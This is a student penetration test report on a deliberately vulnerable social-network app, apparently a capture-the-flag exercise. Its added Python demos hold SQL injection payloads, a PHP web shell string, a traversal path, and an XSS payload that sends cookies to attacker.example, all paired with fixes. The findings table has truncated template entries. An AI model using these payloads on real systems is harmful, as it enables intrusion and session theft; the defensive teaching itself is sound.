FCIS-Book-Testing-Report
FCIS book solved
Uploaded by youssefelkiki

Penetration Testing Report

Table of Contents

1 Executive Summary
2 Assessment Overview
  2.1 Planning
  2.2 Discovery
  2.3 Attack
  2.4 Reporting
3 Finding Severity Ratings
4 Scope of Engagement
  4.1 Targets
  4.2 Scope Exclusions
5 Findings Table
6 Technical Findings

1 Executive Summary

In the heart of Ain Shams University's bustling campus, a group of computer science students were buzzing with excitement. Inspired by the tale of Mark Zuckerberg, they started their mission to create their own social networking platform, "FCIS Book", exclusively for their fellow FCIS peers.

FCIS Book was designed to be a digital hub where students could connect, share updates, and engage with each other. It offered a variety of features, including:
• User profiles: Students could create personal profiles to showcase their interests, hobbies, and academic achievements.
• Comment sections: Users could leave comments on posts, sparking discussions and fostering a sense of community.
• Search functionality: A search bar allowed users to easily find friends.
• Profile picture uploads: Students could personalize their profiles by uploading their own profile pictures.

As FCIS Book grew in popularity, whispers of hidden vulnerabilities began to circulate among the student body. Tales of flags tucked away in unexpected corners and opportunities for unauthorized access piqued the curiosity of a group of tech-savvy individuals, the self-proclaimed "FCIS Vuln Hunters."

Driven by a passion for cybersecurity, the Vuln Hunters embarked on a quest to uncover the secrets of FCIS Book. They carefully analyzed the website's code, scrutinized its functionalities, and delved into the depths of its user interactions. Their investigations led them to discover hints of potential vulnerabilities, subtle clues that suggested hidden flaws within the platform's security. These observations fuelled their determination to uncover the truth.

The Vuln Hunters' persistence paid off. They discovered vulnerabilities
that allowed them to manipulate user profiles, inject malicious code,
and even gain unauthorized access to sensitive information. These
discoveries highlighted the importance of robust security measures,
user input validation, and access control mechanisms.
The FCIS Book development team left a trail of breadcrumbs for the
Vuln Hunters to follow. Amidst their coding, they stored comments and
reminders in an unencrypted file named "secret.txt". This file became a
roadmap for the Vuln Hunters, revealing a cryptic message that
signaled the presence of a hidden vulnerability. The Vuln Hunters were
poised to uncover the platform's deepest secrets, armed with this
newfound knowledge.
The FCIS Book development team's reliance on the GET method for home page interactions proved to be their undoing: the home page also answered other HTTP methods (OPTIONS and HEAD), and each of them returned a flag. The Vuln Hunters, armed with their knowledge of HTTP methods and web proxies, exploited the home page's weaknesses, uncovering hidden vulnerabilities and potential entry points for unauthorized access.

The FCIS Book Vuln Hunters' relentless pursuit led them to the super user's password, a coveted credential that unlocked the platform's core functionalities. Empowered with this newfound power, they could delve deeper into the system, uncovering hidden secrets and potential vulnerabilities. Their journey had transformed them from mere students into cybersecurity enthusiasts, ready to safeguard their digital realm.
Unfazed by the "super" user's claims of invincibility, the FCIS Book Vuln
Hunters embarked on a mission to crack his password, a challenge that
would test their skills. Through persistent effort, they finally gained
access to the account, only to discover a password far from "super" in
strength. This discovery served as a humbling reminder to the "super"
user and highlighted the importance of staying vigilant and
implementing robust security measures.
The FCIS Book Vuln Hunters' final challenge was to breach another
user's password, a feat that demanded both skill and perseverance.
Through relentless attacks and cryptographic expertise, they cracked
the code, gaining access to another user's account.

As the Vuln Hunters shared their findings with the FCIS Book
development team, they hoped that their insights would contribute to
the platform's overall security and strengthen the trust of its users.
Their journey through the vulnerabilities of FCIS Book served as a
testament to their curiosity, ingenuity, and unwavering determination
to protect their digital realm.
This report presents the output of an internal penetration test that was conducted against FCIS Book. It is recommended to fix the vulnerabilities found.

The assessment showed:
• seven Easy vulnerabilities,
• five Medium vulnerabilities, and
• five Bonus vulnerabilities.

2 Assessment Overview

From Dec 2nd, 2023 to Dec 17th, 2023, FCIS Book engaged the assessment team to evaluate the security posture of its infrastructure compared to current industry best practices; the engagement consisted of an internal penetration test. All testing performed is based on the NIST SP 800-115 Technical Guide to Information Security Testing and Assessment, the OWASP Testing Guide (v4), and customized testing frameworks.

Phases of penetration testing activities include the following:
• Planning – Customer goals are gathered and rules of engagement obtained.
• Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.
• Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.
• Reporting – Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses.

2.1 Planning
Planning in penetration testing involves collaboratively defining the scope,
goals, and guidelines for the test. This phase establishes the boundaries of
the assessment, such as which systems are included and the desired
objectives—whether it's uncovering vulnerabilities, testing response
procedures, or assessing controls. Ethical and legal considerations are
addressed, resources are allocated, and a communication plan is set for a
successful testing engagement. This strategic groundwork ensures alignment
between the testing team and the client, leading to a well-structured and
effective penetration test.

2.2 Discovery
• Information Gathering: Collect relevant information about the internal infrastructure, including IP ranges, domain names, and network architecture.
• Open Source Intelligence (OSINT): Utilize publicly available sources to gather additional information about employees, technology stack, and potential weak points.
• Vulnerability Scanning: Perform automated vulnerability scans on the identified systems to uncover known security vulnerabilities.
• Network Mapping: Create a comprehensive map of the internal network, identifying live hosts, open ports, and services.

2.3 Attack
• Manual Vulnerability Assessment: Conduct an in-depth manual assessment of the identified vulnerabilities to validate their severity and potential impact.
• Exploitation: Attempt to exploit the identified vulnerabilities to determine their feasibility and potential impact on the internal systems.
• Privilege Escalation: If necessary, attempt to escalate privileges to gain deeper access into the systems and network.
• Lateral Movement: Explore the internal network for lateral movement opportunities, simulating an attacker's attempt to pivot within the environment.
• Data Exfiltration (If Agreed Upon): Simulate the extraction of sensitive data from the internal systems to demonstrate potential data breaches.

2.4 Reporting
Reporting the findings of the penetration test is integral to fulfilling the strategic motivations behind engaging in such a process. Hence, once the above tasks are completed, a documentation scheme is followed to report the results at different levels, including technical and management levels. The report focuses on the real risk behind the findings to maximize business value. Also, whenever applicable, a detailed recommendation is included on how to fix the identified vulnerabilities and/or minimize their threat.

3 Finding Severity Ratings

The following table defines the severity levels and corresponding CVSS v3 score ranges that are used throughout the document to assess vulnerability and risk impact.

Severity        CVSS v3 Score Range   Definition
Critical        9.0-10.0              Exploitation is straightforward and usually results in system-level compromise. It is advised to form a plan of action and patch immediately.
High            7.0-8.9               Exploitation is more difficult but could cause elevated privileges and potentially a loss of data or downtime. It is advised to form a plan of action and patch as soon as possible.
Moderate        4.0-6.9               Vulnerabilities exist but are not exploitable or require extra steps such as social engineering. It is advised to form a plan of action and patch after high-priority issues have been resolved.
Low             0.1-3.9               Vulnerabilities are non-exploitable but would reduce an organization's attack surface. It is advised to form a plan of action and patch during the next maintenance window.
Informational   N/A                   No vulnerability exists. Additional information is provided regarding items noticed during testing, strong controls, and additional documentation.

Risk Factors
Risk is measured by two factors: Likelihood and Impact:

Likelihood
Likelihood measures the potential of a vulnerability being exploited. Ratings are
given based on the difficulty of the attack, the available tools, attacker skill level,
and client environment.

Impact
Impact measures the potential vulnerability’s effect on operations, including
confidentiality, integrity, and availability of client systems and/or data,
reputational harm, and financial loss.

4 Scope of Engagement
The scope of this engagement includes performing Internal Penetration Testing for FCIS book.

4.1 Targets
Assessment                  Details
Internal Penetration Test   Local host

4.2 Scope Exclusions

Per client request, the following attacks were not performed during testing:
• Denial of Service (DoS)
• Phishing/Social Engineering

All other attacks not specified above were permitted by FCIS book.

5 Findings Table

Risk     Finding
High     Remote Code Execution on
Medium   Outdated Software version at
Low      Server Header information at

6 Technical Findings
6.1 Login page source code

Description:
A flag is embedded in the HTML of the login page and can be read by anyone who views the page source; no authentication is needed to reach the login page.

Recommendations:
• Do not place sensitive data (flags, credentials, internal comments, debug output) in the HTML sent to clients; keep it server-side.

Affected Systems: 192.168.1.23
Threat Level: N/A

FLAG{lYQcDZ2c2IVNdk7Uf0pycjS5sE6IaNzGgkxnlOYoyl1XvoqYove+6RcFFNr0R5L+U/URtL+YokeXnUyfC+vAMiItlPOcIhZCtHaDYLFiMQA=}

Steps to reproduce:
1- The screenshot below shows how an attacker obtains the flag from the page source. [screenshot]

6.2 OPTIONS Method allowed in home page

Description:
Using Burp Suite, the GET request for the home page was changed to an OPTIONS request. The server answered with the list of methods it accepts for the home page, and the response also contained a flag.

Recommendations:
• Allow only the HTTP methods each resource needs (GET for the home page in this case) and answer the rest with 405 Method Not Allowed.
• Do not include sensitive data in the response to any method, OPTIONS included.

Affected Systems: 192.168.1.23
Threat Level: Low

FLAG{ewdso8Cbhxidy9Iw7ZpcEBGnSryT5qe4pwHo5GMu7lEqZmakmZ8UnH+pvHWW+TiXIHaLBH9R+FTFo/VviftFlNCX03Uu9YpKm1oQ3qE4GyM=}

Steps to reproduce:
1- The screenshot below shows how an attacker obtains the flag. [screenshot]

2- [screenshot]

6.3 HEAD method allowed for Home page

Description:
Using Burp Suite, the GET request for the home page was changed to a HEAD request. The server accepted it and the response contained a flag. HEAD is a standard method that every server supporting GET must also support, and its response is the GET response without a body; the concern here is therefore not the method as such but that the flag is reachable through a method the application never uses (whatever it was read from is sent in the response headers, or in a body the server should not return for HEAD).

Recommendations:
• Allow only the HTTP methods each resource needs (GET for this example).
• Do not expose sensitive data in response headers; they are returned to HEAD as well as to GET.

Affected Systems: 192.168.1.23
Threat Level: Low

FLAG{ZsCRgDoljh+tALqnvvjYmybWGwWEjAxwb+pUivOmX/VaAbo5EyDYAnveQ9vaZGSdbXmXIXk0+79dqEck9rA+Z7RbiyGAB1gvE3/HXhgbtjw=}

Steps to reproduce:
[screenshots]

6.4 Access Control (Horizontal IDOR)

Description:
The profile page selects which profile to show from a user id supplied in the request. By changing that id to another user's id, we gained unauthorized access to other users' account details; the server performs no check that the requested profile belongs to the logged-in user.

Recommendations:
• Do not let the client choose whose profile to load: resolve the current user from the server-side session and, for any explicitly requested id, verify on the server that the logged-in user is allowed to view it.
• Unpredictable identifiers are at most a secondary measure; the server-side authorization check is what fixes the issue.

Affected Systems: 192.168.1.23
Threat Level: Moderate

FLAG{Xb8uM97We3o6tMrUgl1RQ9YU0qmX1SH6wW1PwFHnPcQrwlRfcg76I6KoGAf7o90KyxdfSxCYXMUq9kOkln80bHjQSGdeKRFzw2TFizyrIVE=}

Steps to reproduce:

1- [screenshot]
2- [screenshot]

6.5 Access Control (Vertical IDOR)

Description:
By changing the user id on the profile page to 1 and changing the role value stored in the cookies, we gained unauthorized access to the admin's account details. The application trusts a client-controlled cookie to decide whether the caller is an administrator.

Recommendations:
• As in 6.4, do not let the client choose whose profile to load; enforce the authorization check on the server.
• Never derive a user's role from a cookie or any other client-supplied value. Keep the role in the server-side session (or look it up from the database on each request) and check it before serving any administrative data.

Affected Systems: 192.168.1.23
Threat Level: High

FLAG{zKCw7A1+LEZZAtpnJQc5zCgSJXYd9DgKx3PAHsDtLerbgJVtpcAHqRVQvZ5HSHDb87p4ihLSoOnime1TQLaICTDkSIMHouggOQ3TPafNid4=}

Steps to reproduce:
1- [screenshot]
2- [screenshot]
3- [screenshot]
6.6 In-Band SQL-Injection (Error based)

Description:
Searching for a single quote (') produced a raw SQL syntax error in the page, which revealed the name of the users table. Searching for (' or 1=1;--) then turned the search condition into a tautology and returned all users.

Recommendations:
• Use parameterised (prepared) statements for the search query; this is the actual fix, input validation on its own does not prevent SQL injection.
• Do not display SQL errors to end users; log them server-side and return a generic error message.
• Validate the search input (length, allowed characters) as defence in depth.

Affected Systems: 192.168.1.23
Threat Level: High

FLAG{h0VsPrWePG0aJQMnn4XLc1hS8hVxxKs7c5vhiVuP4AakCecGUBpblmEd+jIsheaz2O2eWFNs+FXH9K/4MDHUP5grLZOroeHRexw9XjhlTtY=}

Steps to reproduce:
1- [screenshot]
2- [screenshot]
3- [screenshot]

4- [screenshot]

6.7 In-Band SQL-Injection (Union Based SQL-i)

Description:
Using a UNION-based injection in the search field we extracted all table names, i.e. the database schema information.

Recommendations:
• Use parameterised (prepared) statements for the search query.
• Do not display SQL errors to end users.
• Validate the search input as defence in depth.
• Run the application's database account with least privilege so that it cannot read schema catalogues or tables it does not need.

Affected Systems: 192.168.1.23
Threat Level: High

FLAG{MiqzbRG3DSTUsGHyAXGfp1Mo6cML+P5VmqjAegyN7reh8gTLCan7RVf0gQBFKc5+bw56xamuwCvXdoobh6CXkhGpaOHZ1hHXvi8tF2YN3gM=}

Steps to reproduce:
1- [screenshot]

6.8 Admin's password extracted and cracked

Description:
Using a UNION-based injection we extracted the admin's password hash from the users table and recovered the plaintext by cracking the hash (a hash cannot be reversed; it was matched against candidate passwords, e.g. by a lookup or dictionary attack). The password turned out to be "adminadminadmin".

Recommendations:
• Use parameterised (prepared) statements and stop displaying SQL errors (see 6.6).
• Store passwords with a slow, salted password hash (bcrypt, scrypt or Argon2) so that an extracted hash cannot be cracked cheaply.
• Enforce a password policy, in particular for administrative accounts; "adminadminadmin" is recoverable from any common wordlist.

Affected Systems: 192.168.1.23
Threat Level: Critical

FLAG{umO/g4/n55I1mUIP7UVLc4pu3tRAhSGIQZT1Ywe0TPAGc1/ebIqQcuZyy7D+1tSH6xLMgoyJ907kMTlP58/4vb4+Qbm9HX7nOJIGF0RIVXQ=}

Steps to reproduce:
1- [screenshot]
2- By cracking the hash we obtain the admin password (adminadminadmin). [screenshot]

6.9 Broken Access Control

Description:
APIs and routes were easily enumerated with the dirb directory brute-forcing tool. A robots.txt file was found and a flag was extracted from it.

Recommendations:
• Do not rely on routes being unknown: every API endpoint and route must enforce authentication and authorization on the server, whether or not it is linked from the user interface.
• Do not list sensitive paths in robots.txt; it is a hint for crawlers, not an access control, and it is readable by anyone.
• Rate-limit and monitor for enumeration traffic (bursts of 404 responses from one client) so that scans are detected.

Affected Systems: 192.168.1.23
Threat Level: High

FLAG{syJfbEh+W2gdOtENtz67nCvp5bGbkPGi2W64Sum2wEoXP6UUeDdjk29soItimg9cwJyibgU9ZAdGQtFHQcVLMB9heLK6MPz0SmoXquRLWUs=}

Steps to reproduce:
1- [screenshot]

2- [screenshot]

6.10 Broken Super user's password using brute force

Description:
After brute forcing a list of common passwords against the "super" user's account we gained access; the account did not lock and the login was not throttled after repeated failures.

Recommendations:
• Lock the account or throttle logins after several failed attempts for the same account or from the same source address, and alert on it.
• Enforce a password policy that rejects common and short passwords, especially for privileged accounts.
• Consider multi-factor authentication for privileged accounts.

Affected Systems: 192.168.1.23

FLAG{uRGaBAtqUKSJNeT6AHPoMa49fbobxIyhM+OYtG2APWcowjr2ZICj637s3QdseHmZHM1sMKGy6f/r66ITeDjP3QPtcDmDQXyRQsKFX7x/1Gc=}

Steps to reproduce:
1- [screenshot]
2- [screenshot]
3- [screenshot]
4- [screenshot]
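As an added example (not the report's or FCIS Book's code) of why the hash in 6.8 was crackable, how a salted slow hash changes that, and what the lockout recommended in 6.10 should do. The wordlist, the demo accounts and the Login class are constructed here, and PBKDF2 from the Python standard library stands in for bcrypt or Argon2 so that nothing needs to be installed.

```python
# Added example, not code from the FCIS Book project: why the admin hash in
# 6.8 was recoverable, how a salted slow hash changes that, and the lockout
# behaviour recommended in 6.10. The wordlist, the demo accounts and the
# Login class are constructed here; stdlib PBKDF2 is used because it needs no
# third-party package (bcrypt or Argon2 are the usual production choices).
import hashlib
import hmac
import os
import time

# Constructed wordlist; real attacks use rockyou-sized lists or lookup tables.
WORDLIST = ["123456", "password", "admin", "super", "adminadmin", "adminadminadmin"]
PBKDF2_ITERATIONS = 100_000


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_unsalted_md5(target_hex, wordlist=WORDLIST):
    """Dictionary attack. With an unsalted fast hash every candidate is hashed
    once and compared against every stolen hash; the 'unhashing' in 6.8 is this
    lookup, not a reversal of MD5."""
    for candidate in wordlist:
        if md5_hex(candidate) == target_hex:
            return candidate
    return None


def hash_password(password, salt=None):
    """Salted, deliberately slow hash: 16-byte random salt + PBKDF2-HMAC-SHA256.
    The salt defeats precomputed tables; the iteration count raises the cost
    of every guess. Returns salt || digest for storage."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt + digest


def verify_password(password, stored):
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)   # constant-time compare


class Login:
    """Login backend with the lockout recommended in 6.10: after MAX_FAILURES
    consecutive failures the account is locked for LOCK_SECONDS, and even the
    right password is refused while the lock is in force."""
    MAX_FAILURES = 5
    LOCK_SECONDS = 15 * 60

    def __init__(self, users):
        self.users = users      # username -> value returned by hash_password
        self.failures = {}      # username -> (consecutive failures, locked_until)

    def attempt(self, username, password, now=None):
        now = time.time() if now is None else now
        count, locked_until = self.failures.get(username, (0, 0.0))
        if now < locked_until:
            return "locked"
        stored = self.users.get(username)   # unknown user still counts as a failure
        if stored is not None and verify_password(password, stored):
            self.failures.pop(username, None)
            return "ok"
        count += 1
        if count >= self.MAX_FAILURES:
            self.failures[username] = (0, now + self.LOCK_SECONDS)
            return "locked"
        self.failures[username] = (count, 0.0)
        return "denied"


def brute_force(login, username, guesses, now=0.0):
    """The attacker loop from 6.10: try each guess in turn and record the outcome."""
    return [login.attempt(username, guess, now=now) for guess in guesses]


if __name__ == "__main__":
    print(crack_unsalted_md5(md5_hex("adminadminadmin")))   # adminadminadmin
    login = Login({"super": hash_password("super")})
    guesses = ["123456", "password", "admin", "letmein", "qwerty", "super"]
    print(brute_force(login, "super", guesses))             # locks before 'super' is tried
```

A per-account lockout alone lets anyone lock the super user out by guessing wrong five times (denial of service was out of scope here but is a real cost), so pair it with per-source throttling and alerting rather than relying on it by itself.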

6.11 XSS Attack in Search bar

Description:
The search term is reflected into the home page without encoding, so an attacker can craft a search URL containing a script that runs in the browser of anyone who opens it (reflected XSS).

Recommendations:
• HTML-encode the search term wherever it is written into the page (contextual output encoding) rather than relying on filtering characters on input.
• Validate the search input as defence in depth, and deploy a Content-Security-Policy to limit the impact of any script that does slip through.

Affected Systems: 192.168.1.23
Threat Level: Moderate

FLAG{cpfr6UKfcY459SI3RqfuFvduFHfm6+tipacQaNFDDbH4eoiz9pOgpMC3fn/Yzv1r1enNWtn79ClJNdPsAQjd+A==}

Steps to reproduce:
1- [screenshot]
2- [screenshot]

6.12 XSS Attack in Comment Section

Description:
Comments are stored and rendered without encoding. An attacker who posts a comment containing a script gets it executed in the browser of every user who views that post (stored XSS).

Recommendations:
• HTML-encode comment text when it is rendered; if some formatting must be allowed, pass the comment through an HTML sanitiser with an allow-list of tags and attributes.
• Validate comments on submission as defence in depth and set a Content-Security-Policy.
• Mark the session cookie HttpOnly so that an injected script cannot read it.

Affected Systems: 192.168.1.23
Threat Level: Critical

FLAG{Qd65/+P9erCOfMPeC/br20wUuAfQMYoPoyGPqDIHXL2UZ28MC+2VWIHe4bqoufFyB6It2NvLGuFjqnh+/+F+gg==}

Steps to reproduce:
1- [screenshot]
2- This is what happens when any user tries to comment on the exploited post. [screenshot]
6.13 Directory or file traversal (Secret.txt)

Description:
A file that users are not supposed to find or read (secret.txt, the developers' notes and reminders) is reachable from the web application by manipulating the file path in the request.

Recommendations:
• Never build a filesystem path from client-supplied input; if a file name must come from the request, resolve it, canonicalise it and verify that it is still inside the intended directory before opening it.
• Keep developer notes, backups and configuration files out of the web root.

Affected Systems: 192.168.1.23
Threat Level: Critical

FLAG{eqN4N5iTuW07SGnNkkBt+JkNjZvZQu6K0GQGgxIBKptWxrM7G7WvroJLM88MzOU4NmEstlzxFUMV5Zbtspo0RA==}

Steps to reproduce:
1- [screenshot]
2- [screenshot]
3- [screenshot]

6.14 File Upload Exploit

Description:
Attackers are able to upload a cmd.php file as a profile picture. A PHP file stored under the web root with its original name can be requested and executed by the server, which turns the upload into a web shell.

Recommendations:
• Restrict File Types: allow only specific image extensions (an allow-list, checked case-insensitively on the last extension).
• Inspect File Content: verify that the file really is an image (magic bytes, or decode it), not just that the extension says so.
• Enforce Size Limits.
• Store uploads under a server-generated name, outside the web root or in a directory where script execution is disabled, and serve them with a fixed image Content-Type.

Affected Systems: 192.168.1.23
Threat Level: Critical

Steps to reproduce:
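Added example covering the recommendations of 6.13 and 6.14 together: a path-confinement check for the traversal and the validation that keeps cmd.php out of the profile-picture upload. It is not FCIS Book's code; the upload directory, the magic-byte table, the sample PNG and the web-shell bytes are assumptions made for the demo.

```python
# Added example, not code from the FCIS Book project: the path-confinement
# check that closes the traversal in 6.13 and the upload validation
# recommended in 6.14. The upload directory, magic-byte table and sample
# files are constructed for the demo.
import os
import secrets
import tempfile

# Extension allow-list with the magic bytes each image type must start with.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024


def safe_join(base_dir, user_path):
    """Resolve user_path beneath base_dir and refuse anything that escapes it.
    Canonicalising both sides (symlinks, '..', absolute paths) before comparing
    is what makes the check robust; a string prefix check alone is not."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{user_path!r} escapes {base_dir}")
    return target


def escapes(base_dir, user_path):
    """Helper for the tests: True when safe_join rejects the path."""
    try:
        safe_join(base_dir, user_path)
    except PermissionError:
        return True
    return False


def validate_upload(filename, data):
    """Accept only images: size limit, extension allow-list (last extension,
    case-insensitive, so 'cmd.php', 'cmd.PHP' and 'cmd.png.php' all fail) and
    content whose magic bytes match the extension. Returns a server-chosen name,
    so the client never controls where, or under what name, the file lands."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise ValueError("file too large")
    ext = filename.rsplit(".", 1)[1].lower() if "." in filename else ""
    if ext not in IMAGE_MAGIC:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not data.startswith(IMAGE_MAGIC[ext]):
        raise ValueError("content does not match extension")
    return f"{secrets.token_hex(16)}.{ext}"


def upload_rejected(filename, data):
    """Helper for the tests: True when validate_upload refuses the file."""
    try:
        validate_upload(filename, data)
    except ValueError:
        return True
    return False


def store_upload(upload_dir, filename, data):
    """Validate, then write under the generated name inside upload_dir. That
    directory should live outside the web root (or be served with script
    execution disabled) so that a stored file can never run as code."""
    stored_name = validate_upload(filename, data)
    path = safe_join(upload_dir, stored_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return stored_name


def store_in_temp_dir(filename, data):
    """Round trip for the tests: store into a fresh temp dir, read it back."""
    upload_dir = tempfile.mkdtemp(prefix="uploads-")
    name = store_upload(upload_dir, filename, data)
    with open(os.path.join(upload_dir, name), "rb") as fh:
        return name, fh.read()


# Constructed samples: a minimal PNG header and the web shell from 6.14.
PNG_SAMPLE = IMAGE_MAGIC["png"] + b"\x00" * 16
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"

if __name__ == "__main__":
    print(escapes("/var/www/html", "../../etc/passwd"))   # True
    print(upload_rejected("cmd.php", PHP_SHELL))          # True
    print(validate_upload("avatar.png", PNG_SAMPLE))      # <random hex>.png
```

The magic-byte check stops a renamed PHP file, but a valid image with PHP appended still passes it; that is why the stored name and location are chosen by the server and the upload directory must not be executable, so that even such a file is only ever served as image bytes.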

6.15 In-Band SQL Injection (Error Based)

Description:
Entering (' or 1=1;--) in the username and password fields of the login form turns the authentication query into a tautology, which bypasses the login check without a valid password.

Recommendations:
• Use parameterised (prepared) statements for the login query.
• Do not display SQL errors to end users.
• Validate the username and password input as defence in depth.

Affected Systems: 192.168.1.23
Threat Level: High

Steps to reproduce:

6.16 GET Method in Login Page

Description:
Using Burp Suite, the login request was sent with the GET method; the server accepted it and returned a flag. A login that is accepted over GET also puts the credentials into the URL, and therefore into browser history, proxy logs and server logs.

Recommendations:
• Accept only the methods each endpoint needs: the login handler should accept POST only and answer GET with 405 Method Not Allowed.

Affected Systems: 192.168.1.23
Threat Level: Low

Steps to reproduce:

6.17 In-Band SQL Injection (Union Based)

Description:
Using a UNION-based injection we extracted all column names of the users table.

Recommendations:
• Use parameterised (prepared) statements.
• Do not display SQL errors to end users.
• Validate the search input as defence in depth.

Affected Systems: 192.168.1.23
Threat Level: High

Steps to reproduce:
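The five SQL injection findings (6.6, 6.7, 6.8, 6.15 and 6.17) reproduced against an in-memory SQLite database, followed by the parameterised versions of the same queries. This is an added example, not code from the report or from the FCIS Book application; the schema, the seed users and the SQLite catalogue queries (sqlite_master and pragma_table_info, standing in for whatever catalogue the target's real database exposes) are assumptions made for the demo.

```python
# Added example, not code from the FCIS Book project: reproduces the SQL
# injection findings 6.6 and 6.7 (search field), 6.8 (hash extraction),
# 6.15 (login bypass) and 6.17 (column names) against an in-memory SQLite
# database constructed here, then shows the parameterised queries that fix
# them. Table/column names and the sample users are assumptions for the demo;
# the target used a different database, so the schema-catalogue payloads use
# SQLite's sqlite_master / pragma_table_info instead of information_schema.
import hashlib
import sqlite3


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, role TEXT);
        CREATE TABLE posts (id INTEGER PRIMARY KEY, user_id INTEGER, body TEXT);
    """)
    # Unsalted MD5, as in many legacy PHP apps; this is what 6.8 cracked.
    seed = [(1, "admin", "adminadminadmin", "admin"),
            (2, "alice", "alice123", "user")]
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(i, u, md5_hex(p), r) for i, u, p, r in seed])
    return db


# --- vulnerable: user input is concatenated into the SQL text ----------------

def search_vulnerable(db, term):
    sql = f"SELECT username FROM users WHERE username = '{term}'"
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"          # 6.6: raw error shown to the user


def login_vulnerable(db, username, password):
    # Injection through the username; the password is hashed before use here.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{md5_hex(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


# Payloads of the kinds used in the report ('--' comments out the rest).
TAUTOLOGY = "' OR 1=1--"                                                      # 6.6 / 6.15
UNION_TABLES = "' UNION SELECT name FROM sqlite_master WHERE type='table'--"  # 6.7
UNION_COLUMNS = "' UNION SELECT name FROM pragma_table_info('users')--"       # 6.17
UNION_ADMIN_HASH = "' UNION SELECT password FROM users WHERE username='admin'--"  # 6.8


# --- hardened: the same queries with bound parameters ------------------------

def search_safe(db, term):
    rows = db.execute("SELECT username FROM users WHERE username = ?", (term,))
    return [row[0] for row in rows]


def login_safe(db, username, password):
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, md5_hex(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print(search_vulnerable(db, "'"))               # leaks the database error
    print(search_vulnerable(db, TAUTOLOGY))         # every user
    print(search_vulnerable(db, UNION_TABLES))      # table names
    print(search_vulnerable(db, UNION_COLUMNS))     # column names of users
    print(search_vulnerable(db, UNION_ADMIN_HASH))  # admin's password hash
    print(login_vulnerable(db, TAUTOLOGY, "x"))     # logged in as admin
    print(search_safe(db, TAUTOLOGY), login_safe(db, TAUTOLOGY, "x"))  # [] None
```

With bound parameters the payload is compared as a literal username, so the tautology matches nothing and the UNION never becomes part of the statement; the error-hiding and input-validation recommendations then only reduce what an attacker learns, they are not what stops the injection.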

6.18 XSS Attack (Image Based)

Description:
A comment containing an image tag with a JavaScript event handler (for example an img tag whose onclick handler runs script) is stored and rendered without encoding, so the script runs for users viewing the post when they click the comment.

Recommendations:
• HTML-encode comment text on output; if images or formatting must be allowed, sanitise the HTML with an allow-list of tags and attributes that excludes event handlers and javascript: URLs.
• Set a Content-Security-Policy that disallows inline scripts and inline event handlers.

Affected Systems: 192.168.1.23
Threat Level: Critical

Steps to reproduce:
1- [screenshot]
2- [screenshot]
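The three XSS findings (6.11 reflected via the search bar, 6.12 stored in comments, 6.18 image and event-handler based) reduced to their common cause, with the output encoding that fixes all of them. Added example, not code from FCIS Book or the report; the templates and payloads are constructed for the demo and html.escape from the Python standard library supplies the encoding.

```python
# Added example, not code from the FCIS Book project: the three XSS findings
# (6.11 reflected via search, 6.12 stored in comments, 6.18 image/event
# handler based) all come from writing user text into HTML unencoded. The
# templates and payloads are constructed for the demo; html.escape provides
# the contextual encoding for element text and quoted attribute values.
import html

# Constructed payloads of the kinds the report describes.
SCRIPT_PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
IMAGE_PAYLOAD = '<img src="x.png" onclick="alert(document.cookie)">'   # 6.18 style
ATTR_PAYLOAD = '" autofocus onfocus="alert(1)'                         # attribute context


def enc(text):
    """Encode for both element text and double-quoted attribute values."""
    return html.escape(text, quote=True)


# --- vulnerable rendering (what 6.11, 6.12 and 6.18 exploit) -----------------

def search_page_vulnerable(term):
    # The term lands in an attribute AND in element text, both unencoded.
    return f'<input name="q" value="{term}"><p>Results for: {term}</p>'


def comments_vulnerable(comments):
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


# --- hardened rendering -------------------------------------------------------

def search_page_safe(term):
    return f'<input name="q" value="{enc(term)}"><p>Results for: {enc(term)}</p>'


def comments_safe(comments):
    return "<ul>" + "".join(f"<li>{enc(c)}</li>" for c in comments) + "</ul>"


def has_active_markup(rendered):
    """Crude detector for the tests: is there still a tag or attribute the
    browser would act on? Encoded output carries '&lt;' and '&quot;' instead."""
    low = rendered.lower()
    return ("<script" in low or "<img" in low
            or ' onfocus="' in low or ' onclick="' in low)


if __name__ == "__main__":
    print(search_page_vulnerable(ATTR_PAYLOAD))    # breaks out of value="..."
    print(search_page_safe(ATTR_PAYLOAD))          # stays inside the attribute
    print(comments_safe([IMAGE_PAYLOAD]))          # shown as text, not as a tag
```

Encoding is context-specific: html.escape is right for element text and quoted attribute values, but a value placed inside a script block, a URL or a CSS property needs that context's encoder instead, and a Content-Security-Policy plus an HttpOnly session cookie limits the damage from anything that is missed.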
